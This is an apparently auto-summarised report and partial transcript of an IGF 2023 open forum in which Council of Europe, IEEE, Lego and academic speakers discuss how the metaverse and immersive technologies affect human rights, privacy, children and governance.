Benefits and challenges of the immersive realities | IGF 2023 Open Forum #20


Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Patrick Penninckx

The Council of Europe is actively examining the impact of new technological developments, such as AI and immersive realities, on human rights, the rule of law, and democracy. They recognize the importance of ensuring that these advancements uphold these fundamental values. To achieve this, the Council is partnering with IEEE to study the metaverse and its potential impact on human rights.

To guide the development of the metaverse, the Council of Europe emphasizes the need for clear benchmarks that uphold human rights principles. They also highlight the importance of transparency, accountability, and the protection of digital rights within this emerging technology. Additionally, they stress the significance of involving multiple stakeholders, including the technical community, civil society, businesses, and academics, in decision-making processes regarding the metaverse.

Regarding immersive realities, concerns arise about the ethical decision-making process within private businesses. The Council of Europe acknowledges the risks posed by allowing private businesses to solely determine the development of immersive technologies, and calls for a more inclusive approach involving various stakeholders.

The Council also addresses the implications of immersive realities on privacy, with the collection of new forms of data like biometric and psychographic information. They highlight the potential for issues such as misinformation, disinformation, and freedom of expression. They also emphasize the need for inclusive access to immersive realities, particularly in light of the digital divide exposed by the COVID-19 pandemic.

In terms of governance principles, the Council of Europe has worked on data protection, cybercrime, and artificial intelligence. They are currently identifying ethical principles and existing legislation relevant to the metaverse, as well as addressing any gaps that need to be filled. They also express concerns about the influence of technology on human thought processes and freedom of conscience, stressing the need for careful consideration of these aspects.

In conclusion, the Council of Europe’s work on the impact of new technological developments on human rights, the rule of law, and democracy reflects their commitment to ensuring that these advancements align with fundamental values. Their partnership with IEEE to study the metaverse is a significant step in this direction. The Council emphasizes transparency, accountability, digital rights protection, and multi-stakeholder involvement. They are actively addressing privacy concerns, combating misinformation, and promoting inclusive access to immersive technologies, all while upholding human rights and societal values.

Audience

During the discussion, the speakers expressed concerns about the potential access to comprehensive biometric details in the virtual realms. Users’ immersion into these realms could enable the collection of biometric data such as eye tracking, brain activity, and heart rate. Nina Jane Patel specifically raised concerns about this potential breach of privacy and called for regulation and governance of such intimate data in the metaverse. There is a perceived risk of individuals’ biometric data being misused in this virtual environment, highlighting the importance of safeguarding privacy and ensuring data protection.

Another concern raised during the discussion was the impact of immersive technologies on privacy, freedom of conscience, and psychophysical integrity. The speaker from Poland had different considerations regarding privacy and freedom of conscience in the face of these technologies. It was acknowledged that there are technical challenges involved in maintaining the psychophysical integrity of individuals and protecting their freedom of conscience within immersive environments. The speaker’s suggestion was to focus on developing technical solutions to handle these issues.

Content moderation in the metaverse was also a topic of concern. The Executive Director of the UCLA Institute for Technology Law and Policy highlighted the lack of effective tools for moderating content at scale in these new technologies. The standards that exist for traditional social media platforms cannot be effectively applied in the metaverse. This raises questions about maintaining safety and regulating content in this evolving virtual space.

Furthermore, it was noted that the impacts of the metaverse will vary based on socioeconomic and geographical disparities. Steve Fosley from UNICEF pointed out that the cost of metaverse technology, such as VR headsets, could be prohibitive for some individuals. Not everyone will have the same quality of access to these technologies, and some may interact with artificial intelligence (AI) and the metaverse in less immersive and sophisticated ways. This highlights the potential for increased inequalities based on access and resources.

Overall, the discussion highlighted concerns about the access and misuse of biometric data, the need for governance and regulation in the metaverse, the impact of immersive technologies on privacy and freedom of conscience, the lack of effective content moderation tools, and the potential for disparities in the metaverse based on socioeconomic and geographical factors. The analysis provides valuable insights into the challenges and considerations surrounding the development and implementation of these emerging technologies.

Irene Kitsara

The increasing use of virtual realms has opened up new possibilities for accessing biometric data, including eye tracking, brain activity, and heart rate. This wealth of information has necessitated a rethink of privacy. Experts have recognized the need to address the potential implications and consequences of such data collection.

One suggested solution is the introduction of “neural rights.” In fact, Chile has already incorporated neural rights into its constitution, demonstrating a growing recognition of the need to protect individuals’ rights and data in the context of advancing virtual realms.

Not only do individuals directly involved in virtual experiences require protection, but the concept of bystander privacy is also a concern. Bystander privacy refers to the privacy of those who may be indirectly captured or impacted by data collection, such as other individuals in the same room as a virtual reality user. Addressing this issue is crucial to ensure the protection and respect of personal privacy in all aspects of virtual realm usage.

When it comes to data governance, experts are divided on the best approach. Some propose self-regulation principles, where individuals, organizations, and industries voluntarily adhere to established guidelines and standards. Others suggest the reinterpretation of existing laws to adapt to the challenges posed by virtual realms. Lastly, the introduction of new laws is also considered a potential avenue for regulating biometric data and ensuring ethical practices.

In conclusion, the growing immersion into virtual realms and the accessibility of biometric data have raised important discussions regarding privacy and data governance. The concept of neural rights has emerged as a potential solution, and bystander privacy is also of significant concern. The best path for data governance remains a topic of debate, with options ranging from self-regulation to the introduction of new legislation.

Adam Ingle

The metaverse and immersive technology have the potential to revolutionise connections among children. Research conducted with UNICEF suggests that social connection plays a vital role in child well-being online, and the metaverse has the capability to enhance this through its connectivity and personalisation features. Avatars and identity in the metaverse enable children to establish unique connections and interact with others in ways that were previously unimaginable. This incredible connectivity has the power to bridge distance and cultural barriers, fostering a global community of children.

Furthermore, the metaverse and digital platforms like Minecraft, Roblox, and Fortnite provide children with an avenue to express and enhance their creativity. These platforms allow children to build imaginative worlds and engage with various forms of artistic expression. Improved technology, interconnectivity, and layered services within the metaverse amplify the creative potential for children, allowing them to develop their creative skills and explore their unique talents.

In addition to fostering social connections and creativity, the metaverse empowers children by enabling them to build their online identity. A strong sense of identity is fundamental to a child’s personal development, and the metaverse provides a digital space for children to shape and express their identity. By creating and managing their online presence, children can gain a sense of confidence, autonomy, and empowerment.

However, it is important to implement the metaverse in a responsible and considered manner, particularly when it comes to children. The potential risks and harms associated with the metaverse necessitate the establishment of high safety standards and responsible design. A collective approach by all stakeholders is essential to address the interconnected and interoperable nature of the metaverse. By ensuring robust safety measures and responsible design, a kid-friendly ecosystem can be created within the metaverse, safeguarding the well-being and protection of children.

Regulation and legislation are key aspects of addressing the challenges and issues in the metaverse. The development of regulatory frameworks and the resolution of existing problems from Web 2.0 platforms are crucial to ensuring a safe and secure metaverse environment. By learning from the experiences and responses to Web 2.0, it is possible to establish effective measures that protect children’s rights and well-being in the metaverse.

Furthermore, it is important to observe and evaluate the evolution of current Web 2.0 regulations and cultural responses. This ongoing assessment will provide valuable insights and guidance in handling the challenges and implications of the metaverse. By learning from the past, we can adapt and develop appropriate strategies and policies to shape a responsible and inclusive metaverse for future generations.

Lego, a prominent advocate for child safety, is committed to creating kid-friendly environments in and beyond the metaverse. Lego emphasises the importance of high safety standards and aims to establish a truly immersive ecosystem that prioritises children’s well-being and protection. Their dedication acts as an example and encourages others to join in implementing stringent safety measures and creating a child-friendly metaverse.

In conclusion, the metaverse and immersive technology have the potential to revolutionise connections among children, foster creativity, and empower them. However, responsible and considered implementation is crucial to mitigate potential risks and ensure the well-being of children. Regulation, safety standards, and observing the evolution of Web 2.0 regulations are vital aspects in handling the challenges of the metaverse. By establishing a collaborative and proactive approach, a safe and inclusive environment can be created, where children can explore, learn, and connect in the metaverse.

Melodena Stephens

The Metaverse, with a potential market size of up to 13 trillion USD, is undergoing rapid adoption in various sectors. Governments, educational institutions, and retail businesses are among those embracing this concept. Cities and countries are implementing digital twin strategies, while industries like manufacturing are creating digital twins for their operations. Education and healthcare sectors are also driving the adoption of Metaverse technologies. However, concerns about employment, behavioural addiction, environmental impact, cultural representation, and the need for effective governance have been raised. Collaboration, transparency, and careful consideration of social and ethical implications are crucial in harnessing the full potential of the Metaverse while mitigating risks.

Hugh

The concept of the metaverse, first introduced by Neal Stephenson in his 1992 sci-fi novel Snow Crash, refers to a digital universe that could exist either alongside or as an extension of our current reality. It has garnered significant interest in the field of digital technology and is seen as the next phase of digital transformation.

Artificial intelligence (AI) plays a crucial role in the development of the metaverse, along with other technologies such as extended senses and actions (XR or spatial computing), persistent virtual worlds (persistent computing), and digital finance and economy (consensus computing). These core technologies, combined with supporting technologies like computation, storage, communications, networking, data, knowledge, and intelligence, are necessary components for creating the metaverse.

The metaverse is believed to have the potential to become the next version of the internet, redefining production and life in the process. It is seen as the natural progression from the current “intelligentization” phase, which is characterized by the rise of AI.

Hugh, in particular, holds the view that the metaverse is the next major advancement in digital transformation. He predicts that it will have a profound impact on various aspects of society, revolutionizing production methods and reshaping daily life.

Overall, the metaverse, with its integration of AI and technological advancements, presents exciting possibilities for the future. It is poised to bring about a new era in digital transformation that will have wide-reaching effects. As discussions around the metaverse continue, it will be interesting to see how these ideas evolve and shape the digital landscape in the coming years.

Clara Neppel

This analysis explores various topics related to virtual reality, immersive realities, digital twins, partnerships, and ethics. Clara Neppel, a prominent figure in this field, emphasizes the importance of architecting virtual reality in a way that encourages happiness and well-being. She believes that a multidisciplinary approach is necessary, involving not only technologists but also individuals with different perspectives such as ethics and social sciences.

Immersive realities, as highlighted in the analysis, contribute to safer flights through extensive pilot training. By allowing pilots to undergo training in immersive simulated environments, they can effectively manage challenging situations and improve their skills.

The analysis also discusses the role of generative AI in revolutionising design, particularly in the automotive industry. Immersive realities are used for testing designs, enabling designers to envision and evaluate various possibilities before implementing them in the physical world.

Digital twins, virtual replicas of cities or ourselves, play a crucial role in achieving goals related to climate and sustainable cities. By creating accurate digital representations, cities can better understand and address environmental challenges. Digital twins also offer opportunities to improve inclusive health and education by providing insights and personalised approaches to healthcare and learning.

Partnerships are highlighted as essential in achieving common goals. Collaboration among various stakeholders, including government bodies, NGOs, and private sector entities, is crucial for addressing complex challenges and advancing sustainable development.

Virtual reality is shown as a tool to help citizens understand the full impact of measures related to climate change. By creating simulated experiences, individuals can gain a deeper understanding of the consequences of their actions and make more informed decisions.

However, the analysis also points out that immersive realities and the metaverse introduce ethical challenges and issues. Concerns such as privacy, data protection, safety, and security need to be carefully addressed to ensure the responsible and ethical use of these technologies.

The governance of virtual spaces, including the metaverse, is highlighted as an area that requires a new system. Discussions are already underway regarding who should control the code and the resulting services. The concept of co-creation of infrastructure and its implications for ownership are also discussed.

The analysis raises concerns about the potential privacy issues that may arise with the omnipresence of technology in the future. It emphasizes the need to carefully navigate the balance between technological advancements and individual privacy rights.

Safety and interoperability of regulations are identified as major concerns in the deployment of AI solutions in various sectors. Poorly designed AI systems can have real impacts on individuals, particularly in the field of healthcare. Therefore, ensuring safety becomes paramount in discussions surrounding AI deployment.

The analysis emphasizes the need for interoperability of regulations through the establishment of global standards. These standards operationalise regulations and move from mere guiding principles to practical implementation.

A combined top-down and bottom-up approach is identified as crucial in developing a comprehensive framework. This approach involves considering the perspectives of both regulatory bodies and grassroots initiatives. The work of the Institute of Electrical and Electronics Engineers (IEEE) on ethically aligned design initiatives is cited as an example of a bottom-up approach.

Content moderation, both in terms of public and private control, is highlighted as a major point of discussion. Clara Neppel believes that this topic lies at the heart of discussions within the Internet Governance Forum.

Additionally, the importance of anonymity in exercising citizen rights is stressed. Anonymity provides individuals with the freedom to express themselves without fear of repercussions and plays a vital role in maintaining a balanced and inclusive society.

In conclusion, this analysis showcases the wide array of topics surrounding virtual reality, immersive realities, digital twins, partnerships, and ethics. It highlights the need for comprehensive approaches and collaborations to tackle the challenges and harness the potential of these technologies in a responsible and beneficial manner.

Session transcript

Irene Kitsara:
Thank you. Good afternoon, ladies and gentlemen, and welcome to the open forum number 20 of the IGF 2023 on benefits and challenges of immersive technology. We have a number of speakers today. I will start with on-site panelists in alphabetical order. So we have with us Adam Ingle, global lead in digital policy from the Lego Group. We have Clara Neppel, senior director of European business operations at IEEE. And we have Patrick Penninckx, head of the information society department from the Council of Europe, and the Council of Europe operating officer from then, the NRA, close to the network step. In remote participation, we have Professor Melodena Stephens, professor of innovation and technology governance from the Mohammed bin Rashid School of Government. We have the IEEE SA president. Welcome. I have the pleasure to be the moderator of this session. This session relates to a very important report on the metaverse and its impact on human rights, the rule of law and democracy. So let me start by asking Patrick and Clara why the Council of Europe is organizing this session today and working on

Patrick Penninckx:
issues related to emerging technologies, and also what is the role of IEEE in this. I think it is very important for the Council of Europe, and the Council of Europe as a collective, to always work at the edge of the developments of technology. Already in the 80s, we worked on the data protection convention. Later on, 20 years ago, we developed the cybercrime convention. So we are always trying to ensure that the new technological developments are compatible with our values, and that goes for the new technology which is encompassed through artificial intelligence and the immersive realities. We also need to see to which extent this coincides with, and reinforces or poses a certain number of challenges to, the development of human rights. So I will have to start again, I guess. What I was trying to say is that the Council of Europe has always been at the edge when it comes to the development of new technologies. Whether we look at the automated processing of personal data already 40 years ago, or the cybercrime convention more than 20 years ago, for us it was always very important to look at the impact that those emerging technologies, and in this case the immersive realities, have on human rights, the rule of law and democracy, and to work in partnership with IEEE on looking into the metaverse and how the metaverse would impact those human rights. And that’s why we decided to organize this workshop here.

Clara Neppel:
Thank you. And thank you for having us here. So my name is Clara Neppel, and I’m the senior director of IEEE in Europe. We are based in Vienna, Austria. And on my flight here, I actually saw a documentary about a famous Austrian architect, Karl Schwanzer, who said that man creates buildings, and buildings create man. And actually, it’s the responsibility of an architect to create buildings which make people happy. And now we are at a time when we are creating a completely new virtual reality, and we are the architects. And I think that we cannot do it alone as technologists. I think that we need to create an immersive reality which makes people happy, which cares for well-being, and of course, also for human rights and society. And we need to bring, also in this report, that’s what we tried to do, different perspectives: from the technological side, from the ethical side, the social side. And yes, this is basically the bidirectional dialogue that we need to continue, also in this sense. Thank you.

Irene Kitsara:
Thank you, Patrick and Clara. So we are hearing the terms metaverse, immersive realities, and also, in other sessions, related terms such as virtual worlds. And I think it would be good for our discussion to talk a little bit about these terms, as well as the technologies that are making such realities possible for us to experience. So with that, I would like to turn to Hugh to provide us with his perspective on this.

Hugh:
Thank you, Irene. So as we all know, the term metaverse was coined by Neal Stephenson in his sci-fi novel 30 years ago. But during the past decades, this concept itself has been extended quite a bit. So let me share with you our definition of metaverse. We are trying to provide the most inclusive definition for metaverse. So in terms of metaverse, we could agree that this is talking about a digital universe. So from the experience perspective, we can say there are three types of metaverses. It could be a different digital universe, or it could be a digital counterpart of our current universe, or it could be a digital extension of our current universe, which means these three different types of digital universes correspond to virtual reality, augmented reality, and the digital twin. So from that perspective, metaverse refers to a kind of experience in which the outside world is perceived as a universe. But from another angle, the functional view of the internet… Well, how about now? Let me say again. Could you hear me? Hello? Now we can hear you, thank you. Okay, sorry. So we know metaverse from another perspective. We call that a functional view. The metaverse could be referred to as the next stage of digital transformation. So with that being said, let’s take a look at the metaverse technology landscape. We can say that, of course, supporting technologies like computation, storage, communications, networking, data, knowledge, and intelligence are all necessary for enabling the metaverse. But there are also core technologies for the metaverse, namely extended senses and actions. You can call that XR, or you can call that spatial computing. And the second category is persistent virtual worlds. We call that persistent computing, which is about how to create virtual maps, virtual scenes, virtual objects, and the virtual characters collectively constituting virtual worlds.
And lastly, digital finance and economy, which you can also call consensus computing, which is about digital assets that may or may not be built upon decentralization and blockchain. So from this technology roadmap, or landscape, you can say that AI is actually an integral part of the metaverse technology landscape. So with that being said, we can say that the metaverse is the next biggest thing. Why? Because if we look at the history of digitalization, or digital transformation, we are actually between two stages. The current stage, which is already exploding, is what we call intelligentization, which is about the rise of AI, using AI everywhere. But the next phase, enabled by AI and now upcoming, is the metaverse. So we are currently between these two stages. And I could also add that, as always, many of us will agree that AI is transforming production, transforming the forces of production and the relations of production, but the metaverse will redefine production and redefine life. So that’s why we say the metaverse is the next biggest thing. So I’ll stop here. Irene?

Irene Kitsara:
Thank you very much, Hugh. And you touched upon the fact, you know, that we have different areas of application of the metaverse. And I would like to now turn to Melodena and ask her about some application areas, and then move to Clara and Adam and talk about some of the benefits that can arise from the use of immersive experiences, and ways that the metaverse can also promote, for example, human rights, the rule of law and democracy. Melodena, would you like to start?

Melodena Stephens:
Thank you. So when Facebook changed its name to Meta in October 2021, the market speculated that the total size of the metaverse is 13 trillion US dollars. Over time, that number got revised and went downwards, but I do not think it is a wrong estimate at all. The first reason is that the metaverse is also hardware. So you see this doubling of computing power every 18 months. You also see a lot of the geopolitical tension pushing the adoption of the metaverse. You can see this in the 5G wars and in the proxy wars currently going on. You also see the private sector’s tremendous interest. In fact, the applied research from the private sector is greater than government investment. And you see this in things like, for example, Microsoft’s acquisition of Activision Blizzard for about 69 billion US dollars. We also see governments are huge adopters, and I’m gonna go through that very briefly, but we see a standards war coming out and it’s being played by the private sector currently. You see Pokemon Go, which was an augmented reality game, got 50 million customers in 19 days. So that’s a huge adoption curve. You also see a price war happening right now, with Meta’s Oculus glasses priced at 500 versus Apple’s glasses priced at 3,500, all in time for Christmas. So gaming continues to drive the metaverse right now. There are more than 160 virtual worlds. Fortnite, for example, has half a billion customers and generates something like 6 billion US dollars. A lot of this income is also micro-purchasing. We can’t ignore other players which have huge numbers. For example, Meta with 3.88 billion users. Microsoft with most of the Fortune 500, and keep in mind, Microsoft has Microsoft Mesh and now has Activision, that’s 92 million monthly users, and Minecraft, with a significant number of children. Apple has 1.5 billion users entering into the payment circle, and Google has 4.3 billion tens and 1.26. And we see Nvidia, which was typically a hardware provider, now entering into this space. 
So the crossovers are very interesting, and that’s why I think it’s very hard to determine the market. Now, industry applications are, for example, in digital twins. We have countries adopting it, and cities as well. The UK has a digital twin strategy, for example. South Korea has one, but we also see cities adopting it. We see manufacturing: there are factories that are adopting and creating digital twins, Siemens, BMW, so definitely Germany. We see it in the utility sector, Sydney Water. We see it in ADNOC, which is petroleum, oil and gas. We see 900 smart cities. So with the internet of all things, I think this is also pushing the adoption of the metaverse. We have 125 billion connected devices in 2023. We see government, which historically has contributed approximately 40% to GDP, maybe at the higher end, also entering. So for example, tourism. During the pandemic, Dubai hosted the World Expo. They had 24 physical visitors coming to the site, it was COVID after all, but 125 virtual visitors. And this becomes part of their legacy. We see KSA with Neom, and Finland in Minecraft, actually, with the 3D version of Helsinki as a city. We see education as a huge adopter. Typically, it’s being pushed by engineering and health, and that’s also where a lot of the research is happening right now. There was the first surgery, but it was more to access digital records, and some work is happening on customer care. A lot on re-skilling. For example, Accenture bought 60,000 Oculus Quest headsets in 2021 for their employees, and they created the Nth Floor for training and for networking. We also see retail heavily getting involved in the metaverse. Typically, right now, it’s more experiences. Brands are testing it out. We’ve got luxury brands like Gucci, Burberry, fashion brands like H&M, Forever 21. I mean, you name it, they are there, but they’re experimenting right now. There is no doubt we will reach 13 trillion. 
I think it’s a function of standards or maybe who will win the standards war, and also what is the situation with regulations. I’ll stop there right now, Irene.

Irene Kitsara:
Thank you, Melodena. Patrick?

Patrick Penninckx:
Well, well, if, is it on? Is it on? Yes, it is on. Okay. Well, the question that Vint Cerf just asked in the opening session of the high-level opening remarks was: what is the internet we want, and what is the internet we deserve? So these are two different questions, and the same goes for the metaverse. What is the metaverse we want, and which one do we deserve? I think if we want to create a metaverse that is respectful of human rights, that will enhance freedom of expression, that will be inclusive, that will be accessible, that will be fostering global connections, we need to put those mileposts and benchmarks in place, and that’s why we cannot just let digital development happen. We have to be able to steer that digital development. I wouldn’t say that we need to steer innovation. I think that is for companies to do. But we need to put those benchmarks right that make sure that there are within the metaverse also innovative educational opportunities, that there is democratic participation, that there is digital rights protection. We very often at the level of the Council of Europe say: the protection of rights that we ensure offline, we also need to ensure online. The metaverse is the next step up, with the Internet of Things, with connected realities, with 5G, with quantum computing, and how that all interrelates together, and certain industries are very far ahead. It wasn’t mentioned earlier on, but, for example, testing in the metaverse how it feels to be underwater. These are innovations that we need to be able, not to grasp, but at least to be able to say what usage we want them to have in the future. I could imagine that it not only gives you the feeling of jumping off a cliff into the ocean, which would be a fantastic use of the metaverse, I guess, but if we are able to use the metaverse in order to do waterboarding, this may be a completely different reality. 
So we need transparency, we need accountability, we need digital rights protection, and I think experience already shows that we need to give a certain guidance on that. We're trying to do that for the technologies that are being developed. Right now we're developing a regulation on artificial intelligence, a framework convention that will deal with this. We hope to finalize it by mid-next year, but the metaverse is also part of our future work plans, and the fact that we can work together with IEEE on those kinds of things seems to me essential, because, as we said before, it is in this multi-stakeholder context that we need to be able to discuss it from all angles, whether from the technical community and the engineers' point of view, from the business point of view, but also from an ethical point of view, a civil society point of view, an academic point of view, and to be able to govern all of that. So I think the benefits are there, and we can work towards the promotion of human rights, the rule of law and democratic participation, but it is not going to happen by itself. We've seen that with the development of the Internet. The Internet has given us a number of opportunities. We want it to be open and transparent and flexible and worldwide, but we are increasingly getting a more fragmented world. And we also know that if we just let things happen, we may get the metaverse we deserve, but not the metaverse we want. I think that is important to look at from a human rights perspective.

Clara Neppel:
Clara and then Adam, on the benefits. Yeah, thank you. Well, I think we have already heard quite a lot about the benefits. I was also thinking, again on my flight to Japan, that immersive realities probably already contributed to making this flight, and your flights as well, safer, because the pilot was presumably trained for hours and hours in immersive realities to master situations which we hopefully never encounter, or at least not very often. So that is already an immersive reality which helps us. And we are now hearing about generative AI, which is also going to revolutionize design. The car industry is already testing out different design options in different immersive realities. And we heard about these digital twins of cities, and somebody asked us to try to map this to the SDGs, so I will try to do some of that. The obvious one would of course be SDG 9, industry, innovation and infrastructure. But if we go to the digital twins of cities, and even of the planet, we are of course also touching on SDG 13 on climate, and on sustainable cities. And we are moving to digital twins of ourselves, and I think this is where our collaboration with the Council of Europe is going to be essential, because there we are entering a realm that we certainly cannot handle alone when it comes to human rights, democracy and the rule of law. So digital twins of ourselves, what does that mean? It means of course inclusive healthcare, SDG 3, and education, which was already mentioned, SDG 4. But what is very close to my heart is really SDG 17, and that is partnership: partnership for these common goals. And I think this is going to be a real game-changer. If we are thinking about climate change, we see quite a lot of measures which are very, very difficult to implement, because citizens don't understand their full impact and there is a lot of fear.
What does it mean if a solar panel is very close to my field, or if I have a wind turbine somewhere nearby? What does it mean if my city implements new measures for traffic control? This is something we can try out in virtual reality, and we can really enhance the democratic participation that Patrick talked about. Thank you.

Adam Ingle:
Thank you. I think the benefits have been well canvassed, but I'm from the LEGO Group, so I'll focus my comments on what it might mean for children. It really has tremendous potential to amplify the things that kids care about. We've undertaken research alongside UNICEF to try to understand what child well-being online is, and what components, elements and building blocks actually make children feel they are in a positive space. One of them is social connection. I think the metaverse, its immersivity, and the interoperability between different layers of the internet and different services can connect children in a way that is unprecedented. You're not just a username; you're an avatar. You have a sense of identity that is carried across experiences, built up through a history online, and that conveys a unique sense of yourself to your peers and other kids. So you can connect in a way you haven't been able to before, and that's really what kids value. You can create in a way that you can't do offline, even with LEGO bricks; you are able to really build these worlds around you. You've seen the power of Minecraft, Roblox, what's happening in Fortnite. These are all early metaverses. As the technology improves, not just the graphics but the interconnectivity and the layers of services, the creative potential is huge. And children learn through creation; that's what we've really found. So they can do that in an even better way. You can also empower kids. They have this sense of identity, they're online, they're engaging, they're building their own lives there, and they really value this sense of empowerment. Often they can find some interactions quite patronizing, but they have a right of access to the benefits of technology, and the metaverse is an avenue for that. So they can learn, create, connect, do all these things.
Now, I know we're getting to the downsides later, but I do want to add a massive caveat to all of that: these things need to be done in a responsible way, particularly with children. With social connection, we've seen the harms that come from an unconsidered approach. So the benefits are tremendous, but it needs to be done right. Hopefully that's a good segue.

Irene Kitsara:
Absolutely, thank you for that. I think we have the spoiler alert in the title of the session about the challenges, and this is part of what a lot of sessions at the IGF are addressing: concerns that come with emerging technologies and applications. So I would like to address this question to all our panelists: what are some of the challenges that could arise from immersive realities, and what potential impact could they have on human rights, the rule of law and democracy, remembering who the organizer of the event is. Let me give a bit of background on what we have covered in the upcoming report. On one side, we have looked into the enabling environment that immersive realities and the metaverse can create for exercising human rights, the rule of law and democracy. Other issues we have looked into relate to privacy and data protection, safety and security, protection of children and other vulnerable populations, access and accessibility, inclusion and non-discrimination, freedom of expression and censorship, the labor environment, and of course issues related to the rule of law, such as territoriality, enforcement, access to justice, and democracy. But before we all despair, let's start with some of these issues. I will start with Clara, and then we can move to Patrick, Melodena and Adam.

Clara Neppel:
Thank you. So I already mentioned that we have very practical examples of virtual reality. We have autonomous cars being tried out in different scenarios. But even there, there are certain ethical questions: a cow on the street might have a completely different value in India than in Europe. And now, if we have these digital twins or avatars or digital humans, we are of course entering completely new territory. With these digital humans interacting in a seamless, interconnected space, who is going to control that space? Until now, these immersive realities, and also the rules of engagement, have been designed by private actors. Now, if we have something like a public space, who is going to decide who may enter that space? What is acceptable behavior? And when should somebody be excluded? So here again, we are discussing how to make that space as inclusive as possible. We already see a paradigm shift from the moderation of content that we know from AI and social media, to the moderation of behavior and the moderation of space. What does it mean to be the victim of aggression in a virtual space? And again, if we are discussing virtual spaces, what is a public infrastructure? To what extent can people actually co-create that infrastructure? And what does that mean for ownership? We already see our children in Minecraft creating magnificent cities and so on. What does it mean if this is then incorporated into a private virtual space? Whose property is it? And again, who is dictating the rules? In the digital space, we have in open source the governance of who actually controls what code gets in. Some time ago we had something like a benevolent dictator, somebody who dictates which code should be part of that service. Are we going to have something like this in a digital space? Hopefully not. Hopefully we will have democratic participation.
And especially with such a technology, which will very much influence our worldviews, because we are basically going to have a completely different perception of, let's say, a certain environment if we are immersed in it, who is going to control what this looks like? What does it mean for our perception of history, our perception of reality as such? And I think we already heard about privacy. We are entering a completely new space here. We are going to have this technology which is omnipresent. And we have to get away from the technologies that we hear about now, the headsets; we have to think about the technologies which are upcoming. Last week at a Paris fashion show, the Humane Ai Pin was presented: just a very small pin which is there all the time, basically registering and recording everything. It is a kind of digital assistant, a Star Trek-like assistant. The question is, what would it mean for this conference if we had such a technology recording everything that is happening all the time, recording who is talking to whom, and possibly what feelings they have? So you can imagine the kind of information asymmetry we are going to have, and also the power of those who can predict certain alliances, certain power games, in the future. So you can see we have new aspects to existing ethical challenges, like privacy, bias, accountability, and we also have some completely new challenges. Tom Hanks told us last week that there is a digital Tom Hanks around advertising some dental care; he has nothing to do with it. We will have more and more of these digital twins which copy not only our physical features, but also our characteristics, the way we talk and the way we feel. So how much can we actually control these digital selves, these digital feelings?
Are we going to need authentication not only of content, but also of these digital humans? And last but not least, I want to conclude with safety. I think safety is going to play a completely different role than the one we are discussing now in terms of AI. Maybe some of you have heard the advertisement saying that the metaverse is virtual, but its impact is real. I think that's very true. It can have a very real positive impact, for instance in healthcare, but if it is not designed well, it has a very real impact on the patient too. This, among other things, makes designing it the right way very important.

Patrick Penninckx:
Now, human rights activists, but also organizations that stand for human rights, are very often seen as a little bit alarmist, as not seeing the positive sides sufficiently. But it is also for a human rights organization to be able to point those out. The evangelists, if I may call them that, of future developments, including immersive realities, will point at the advantages. They also make serious efforts. I am not speaking for the business community now, but it is not as if that community goes about developing things in a completely unethical way; they put quite a number of resources into place. Meta, unfortunately, was not able to participate in this panel discussion, but I know they make a lot of effort to ensure that ethical principles, human rights principles and legal principles are respected. Adam will certainly say something more about it afterwards as well, because that is their prime concern. Well, not their prime concern; their prime concern remains doing business, obviously. But the question is not so much how many ethical principles are put forward by private business. It is also to what extent this new universe is going to be regulated by private business, and to what extent a democratic society, with the principles that it endorses and tries to promote, has an impact on the development of this new immersive reality. None of us here are immersive natives. I am an analog native. Some of us may be digital natives, and I am not looking at anyone in particular, but none of us are immersive natives. We will have to look into a completely new reality whose contours we do not necessarily see yet. And in order to see those contours, let us not be naive.
I'm old enough to have seen the start of the internet and the positive feelings about democratic governance, participation and the improvement of, let's say, grassroots democracy. But we also see that that was maybe a little bit naive, and that there are a number of things we need to ensure, especially when our societies, instead of growing more democratic and more protective of human rights, are regressing, are backsliding. So let us see what that means. If some of the information and data that have been collected, even until now, fall into the wrong hands, I think we are very badly off. Now, the metaverse and immersive realities also allow for new forms of crime, and raise new questions with regard to jurisdiction. Who is going to be judge and party? Can we be judge and party? Should we not separate those who decide how the developments take place from those who take decisions with regard to jurisdiction over them? Now, we have spoken about privacy; Clara mentioned it before. We are getting into a new dimension of privacy, because in order to create an immersive reality, new forms of data, including biometric and psychographic data, are collected and recorded. These are very intimate, even more so, I would say, than our health data, which are sensitive data. How are they going to be governed? Who was it, Tom Hanks, who complained about deepfakes? I think in the future we will be dealing with something far more immersive than that. To represent yourself through an avatar basically means having a complete picture of yourself, including your expressions, et cetera, to make it more realistic.
In 2034, will the IGF take place in an immersive world, Irene? These are the kinds of questions we need to ask, and what are the consequences for privacy and digital security? How do we identify ourselves? Not only Tom Hanks, but everyone in our room here. What about anonymity, can we still be anonymous? We are outraged about video surveillance, and some countries and some cities are excelling in that, but what about anonymity? What about private life? At least for the European Convention on Human Rights, privacy is one of the pillars, Article 8. What about freedom of expression, and its counterpart, disinformation and misinformation? We see, especially now with the ongoing war, how misinformation and disinformation are being used in a 1930s-like manner, but much more efficiently, to stifle freedom of expression but also to control entire populations. Immersive reality can only be an extra layer of that, and I think we must not be naive and think that everyone is nice. Not everyone is nice. At the IGF, of course, everyone is nice, but there are other people out there who may not be so nice, and who have different intentions for how your private information will be used. Let's also think about inclusivity. The speeches earlier today were all about how we can connect the next 2.6 billion people to the Internet. But how are we going to connect the next 8 billion people to the metaverse? Who is going to be included? What are the elements of inclusion? I see the potential for educational purposes and so on, but in order to benefit from those educational goals, we have to ensure that people can also participate. So, inclusivity, accessibility: how are we dealing with the digital divide, not only worldwide, but also within our societies?
And that is something that was also shown during the COVID crisis: how difficult the digital divide within our countries has been to overcome. So, governance and accountability. It's good to be accountable to yourself, but you can also get away with certain things. I try to be accountable, but I'm not always so accountable. Don't tell anyone, but that's the reality. If you're judge and party, you cannot be totally objective. So, in this multi-stakeholder approach, we need to come to common sense, and I think this IGF also points at that: on the basis of a number of common principles, common values, how do we want to see the next step, not only in internet governance and artificial intelligence, but how do we also measure that in terms of immersive realities, and how are we going to position ourselves? Are we going to be naive and simply hope that the next generation will be defended, or not?

Irene Kitsara:
Thank you. Let's now move to Melodena. And being aware of time, I'm asking all the speakers from now on to be conscious of that, so that we leave time for the Q&A. Melodena?

Melodena Stephens:
